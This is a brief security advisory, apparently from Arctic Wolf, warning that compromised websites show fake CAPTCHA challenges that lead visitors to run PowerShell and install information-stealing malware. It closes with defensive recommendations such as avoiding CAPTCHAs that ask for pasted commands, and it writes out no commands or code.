Who: Threat actors are compromising widely used websites across various industries, embedding a fake CAPTCHA challenge to deliver malware.
What: Victims visiting these compromised sites are presented with a CAPTCHA challenge or redirected to another site with instructions. This process triggers PowerShell code execution, leading to the installation of information-stealing malware. Affected sites include HEP2go (a physical therapy video site) and several auto dealership websites.
Impact: Users who interact with the fake CAPTCHA risk having their systems compromised by malware that can steal sensitive information. Arctic Wolf has implemented detections for this attack and urges users to remain cautious.
Recommendations:
Avoid websites with suspicious CAPTCHA challenges. If a CAPTCHA asks you to copy and paste a command into the Windows Run dialog, the site is likely compromised.
Install Arctic Wolf Agent & Sysmon to detect post-compromise activity (visit link below for details).
Implement security awareness training to help users recognize and report suspicious activity.
Read the full article HERE